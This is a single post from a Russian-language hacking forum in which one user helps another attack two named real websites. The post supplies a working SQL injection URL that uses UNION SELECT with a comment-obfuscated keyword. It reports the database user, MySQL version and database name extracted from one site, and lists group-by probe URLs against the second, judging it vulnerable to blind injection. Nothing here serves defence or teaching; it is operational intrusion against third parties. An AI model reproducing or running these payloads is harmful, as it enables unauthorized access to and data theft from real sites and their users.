Показать сообщение отдельно

  #8  
Старый 14.12.2011, 06:13
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от lightangel  
Код:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39
Код:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please?
Код:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1--+f
user():ozchrist_sope1@localhost

version():5.1.56

database():ozchrist_sope1

Код:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+99999999999--+f  TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+1--+f  TRUE
I think, this is blind injection...
 
Ответить с цитированием